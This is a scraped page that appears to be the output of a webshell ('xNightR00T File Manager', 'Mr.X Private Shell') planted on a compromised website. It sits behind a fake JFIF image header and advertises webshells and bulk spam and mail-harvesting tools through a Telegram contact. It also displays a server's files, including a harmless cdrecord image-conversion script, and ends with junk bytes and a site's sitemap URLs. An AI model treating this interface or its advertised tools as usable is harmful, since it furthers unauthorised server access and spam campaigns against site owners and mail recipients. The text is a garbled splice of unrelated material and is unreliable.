xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/sh

# exit on all errors
set -e

if [ ! -f "$1" ];then
	echo "Usage: `basename $0` [imagefile.ext] [-o|-i]"
	echo "-o will make the bottom of the image be on the outside of the disk"
	echo "-i will make the bottom of the image be on the inside of the disk"
	echo
	echo "Image must be greyscale"
	echo
	echo "make sure the imagefile has the right x-y format"
	echo "run cdrecord driveropts=tattooinfo -checkdrive"
	echo "to find out"
	exit 1
fi


case "$2" in 
	-i)
		convopts="-flip"
	;;
	-o)
		convopts="-flop"
	;;
	*)
		echo "error: arg2 must be -o or -i"
		exit 1
	;;
esac

echo "Make sure the imagefile has the right size"
echo "run cdrecord dev=a,b,c driveropts=tattooinfo -checkdrive"
echo "to find out"
echo
echo -n "Converting $1 to disktattoo_image format: "

## convert it tp ppm format
## note.. -flop = flip horizontally
convert $convopts "$1" "$1-TMP-$$.ppm"

## We only need the data, which is the last line in a ppm file
## tail works mighty fine for this (insert evil dirty-coder-laughter here)
tail -n+4 "$1-TMP-$$.ppm" > "$1.disktattoo_image"

## clean up like a good boy
rm "$1-TMP-$$.ppm"

## notify user that we're done converting
echo "done"
echo

## stop with stupid code commenting
echo "You may now burn '$1.disktattoo_image' to your cd with the command:"
echo "cdrecord driveropts=tattoofile=\"$1.disktattoo_image\" -checkdrive"

Filemanager

Name Type Size Permission Actions
ANNOUNCEMENTs Folder 0755
READMEs Folder 0755
wodim Folder 0755
ABOUT File 1.97 KB 0644
COPYING File 17.5 KB 0644
Changelog File 282.27 KB 0644
FAQ File 1.49 KB 0644
FORK File 3.15 KB 0644
README.SUSE File 641 B 0644
START File 109 B 0644
TODO File 2.47 KB 0644
burnstuff File 661 B 0644
make_diskt@2.sh File 1.33 KB 0644
rc.pp File 2.5 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml